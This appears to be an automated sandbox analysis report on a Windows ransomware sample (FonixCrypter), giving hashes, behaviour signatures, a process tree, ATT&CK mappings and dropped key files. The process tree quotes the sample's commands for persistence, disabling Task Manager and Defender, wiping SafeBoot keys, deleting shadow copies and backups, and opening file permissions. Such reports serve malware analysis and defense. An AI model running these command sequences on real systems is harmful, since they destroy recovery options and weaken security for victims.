Analysis

  • max time kernel
    121s
  • max time network
    110s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    18-11-2020 11:58

General

  • Target

    de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.bin.exe

  • Size

    6.0MB

  • MD5

    df472f90c33e6c341a74fe1ca29dac70

  • SHA1

    d7512488de06b677751014bdc48302c179542558

  • SHA256

    de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e

  • SHA512

    4257e88d9c6f5eec59d1da6749c386b3859be04159ec37aba2adb3704e5f2ce11ef3adfb086b86d1bea03db300e1d82cab08f266cf6fae4d8f929e71918ddcf9

Malware Config

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Drops startup file 1 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Program Files directory 11925 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 112 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 78 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.bin.exe"
    1⤵
    • Drops startup file
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:656
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix /TR %temp%/FonixCrypter.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3196
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\Users\Admin\AppData\Local\Temp/FonixCrypter.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:3392
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2536
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f
        3⤵
        • Adds Run key to start application
        PID:2928
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:648
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f
        3⤵
        • Adds Run key to start application
        PID:420
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:588
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f
        3⤵
        • Adds Run key to start application
        PID:204
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:184
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f
        3⤵
        • Adds Run key to start application
        PID:516
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1760
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        3⤵
          PID:1956
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2316
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
          3⤵
            PID:3548
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1332
          • C:\Windows\SysWOW64\reg.exe
            reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
            3⤵
              PID:3044
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4024
            • C:\Windows\SysWOW64\reg.exe
              reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
              3⤵
                PID:1344
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c cmd.exe /c vssadmin Delete Shadows /All /Quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet/ & icacls * /grant Everyone:(OI)(CI)F /T /C /Q
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2612
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c vssadmin Delete Shadows /All /Quiet
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3724
                • C:\Windows\SysWOW64\vssadmin.exe
                  vssadmin Delete Shadows /All /Quiet
                  4⤵
                  • Interacts with shadow copies
                  PID:3128
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                wmic shadowcopy delete
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3872
              • C:\Windows\SysWOW64\icacls.exe
                icacls * /grant Everyone:(OI)(CI)F /T /C /Q
                3⤵
                • Modifies file permissions
                PID:2820
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Copy Cpriv.key %appdata%\Cpriv.key
              2⤵
                PID:1148
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Copy Cpub.key %appdata%\Cpub.key
                2⤵
                  PID:3216
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Copy SystemID %appdata%\SystemID
                  2⤵
                    PID:4016
                • C:\Windows\system32\vssvc.exe
                  C:\Windows\system32\vssvc.exe
                  1⤵
                  • Modifies service
                  • Suspicious use of AdjustPrivilegeToken
                  PID:536

                Network

                MITRE ATT&CK Matrix ATT&CK v6

                Execution

                Scheduled Task

                1
                T1053

                Persistence

                Registry Run Keys / Startup Folder

                1
                T1060

                Modify Existing Service

                1
                T1031

                Scheduled Task

                1
                T1053

                Privilege Escalation

                Scheduled Task

                1
                T1053

                Defense Evasion

                File Deletion

                2
                T1107

                File Permissions Modification

                1
                T1222

                Modify Registry

                2
                T1112

                Impact

                Inhibit System Recovery

                2
                T1490

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Temp\Cpriv.key
                  MD5

                  8ce08b533e91855c792e3be1cf5516e1

                  SHA1

                  58a009307d684a23852065c6adc042fa85dc8d05

                  SHA256

                  76ee371f2d5cf5aaeb05755d2edd5c0f1a7336118928499e1869df854d5975e8

                  SHA512

                  cec685ea142354f1549c564238fd48e6c44525bc1cd62c43c2f89b71c77273b4581daabba83dc8d33ae9d0aa7c04e7b039757f079f893bef0fe71f1fa6440610

                • C:\Users\Admin\AppData\Local\Temp\Cpub.key
                  MD5

                  c65012cdbbfee0b3dfd907c22e34f0fd

                  SHA1

                  56f4d0d16eec4d975be94ba8f11c1603b61632ac

                  SHA256

                  bff3cec36290a3877b85de2afdc2081046d8307b029e52b2a0c185032f65a623

                  SHA512

                  e198231f15f6b4d12bbc21430292393da935b2d47d5cd0b17d120451e5ab34bf7dfbcbf863d6d5617901f47e90681b60bb47b99d374fc41f9dbd62faf0ee60f0

                • C:\Users\Admin\AppData\Local\Temp\SystemID
                  MD5

                  f9098c590680e3f168ee2f1f29b57524

                  SHA1

                  da477ac775f74dbbcda0755b0189684c07ce7278

                  SHA256

                  a6139df262ba042d8e3576ef97988773038b3068c04eae523365fc253491fd27

                  SHA512

                  b4867daa2b279ebac8246c9b3616154a1fcbf67bed02c50729e607473e76735f282390123ee95eacd55ef6604da1dd17dbfc2f29eed9ec45f498b424da964016

                • C:\Users\Admin\AppData\Roaming\Cpriv.key
                  MD5

                  d41d8cd98f00b204e9800998ecf8427e

                  SHA1

                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                  SHA256

                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                  SHA512

                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                • C:\Users\Admin\AppData\Roaming\Cpriv.key
                  MD5

                  8ce08b533e91855c792e3be1cf5516e1

                  SHA1

                  58a009307d684a23852065c6adc042fa85dc8d05

                  SHA256

                  76ee371f2d5cf5aaeb05755d2edd5c0f1a7336118928499e1869df854d5975e8

                  SHA512

                  cec685ea142354f1549c564238fd48e6c44525bc1cd62c43c2f89b71c77273b4581daabba83dc8d33ae9d0aa7c04e7b039757f079f893bef0fe71f1fa6440610

                • C:\Users\Admin\AppData\Roaming\Cpub.key
                  MD5

                  c65012cdbbfee0b3dfd907c22e34f0fd

                  SHA1

                  56f4d0d16eec4d975be94ba8f11c1603b61632ac

                  SHA256

                  bff3cec36290a3877b85de2afdc2081046d8307b029e52b2a0c185032f65a623

                  SHA512

                  e198231f15f6b4d12bbc21430292393da935b2d47d5cd0b17d120451e5ab34bf7dfbcbf863d6d5617901f47e90681b60bb47b99d374fc41f9dbd62faf0ee60f0

                • C:\Users\Admin\AppData\Roaming\Cpub.key
                  MD5

                  c65012cdbbfee0b3dfd907c22e34f0fd

                  SHA1

                  56f4d0d16eec4d975be94ba8f11c1603b61632ac

                  SHA256

                  bff3cec36290a3877b85de2afdc2081046d8307b029e52b2a0c185032f65a623

                  SHA512

                  e198231f15f6b4d12bbc21430292393da935b2d47d5cd0b17d120451e5ab34bf7dfbcbf863d6d5617901f47e90681b60bb47b99d374fc41f9dbd62faf0ee60f0

                • C:\Users\Admin\AppData\Roaming\SystemID
                  MD5

                  f9098c590680e3f168ee2f1f29b57524

                  SHA1

                  da477ac775f74dbbcda0755b0189684c07ce7278

                  SHA256

                  a6139df262ba042d8e3576ef97988773038b3068c04eae523365fc253491fd27

                  SHA512

                  b4867daa2b279ebac8246c9b3616154a1fcbf67bed02c50729e607473e76735f282390123ee95eacd55ef6604da1dd17dbfc2f29eed9ec45f498b424da964016

                • memory/184-8-0x0000000000000000-mapping.dmp
                • memory/204-7-0x0000000000000000-mapping.dmp
                • memory/420-5-0x0000000000000000-mapping.dmp
                • memory/516-9-0x0000000000000000-mapping.dmp
                • memory/588-6-0x0000000000000000-mapping.dmp
                • memory/648-4-0x0000000000000000-mapping.dmp
                • memory/656-18-0x0000000003740000-0x0000000003741000-memory.dmp
                  Filesize

                  4KB

                • memory/656-19-0x0000000003F40000-0x0000000003F41000-memory.dmp
                  Filesize

                  4KB

                • memory/656-20-0x0000000003740000-0x0000000003741000-memory.dmp
                  Filesize

                  4KB

                • memory/656-41-0x0000000003F40000-0x0000000003F41000-memory.dmp
                  Filesize

                  4KB

                • memory/656-42-0x0000000003740000-0x0000000003741000-memory.dmp
                  Filesize

                  4KB

                • memory/1148-133-0x0000000000000000-mapping.dmp
                • memory/1332-14-0x0000000000000000-mapping.dmp
                • memory/1344-17-0x0000000000000000-mapping.dmp
                • memory/1760-10-0x0000000000000000-mapping.dmp
                • memory/1956-11-0x0000000000000000-mapping.dmp
                • memory/2316-12-0x0000000000000000-mapping.dmp
                • memory/2536-2-0x0000000000000000-mapping.dmp
                • memory/2612-128-0x0000000000000000-mapping.dmp
                • memory/2820-132-0x0000000000000000-mapping.dmp
                • memory/2928-3-0x0000000000000000-mapping.dmp
                • memory/3044-15-0x0000000000000000-mapping.dmp
                • memory/3128-130-0x0000000000000000-mapping.dmp
                • memory/3196-0-0x0000000000000000-mapping.dmp
                • memory/3216-136-0x0000000000000000-mapping.dmp
                • memory/3392-1-0x0000000000000000-mapping.dmp
                • memory/3548-13-0x0000000000000000-mapping.dmp
                • memory/3724-129-0x0000000000000000-mapping.dmp
                • memory/3872-131-0x0000000000000000-mapping.dmp
                • memory/4016-139-0x0000000000000000-mapping.dmp
                • memory/4024-16-0x0000000000000000-mapping.dmp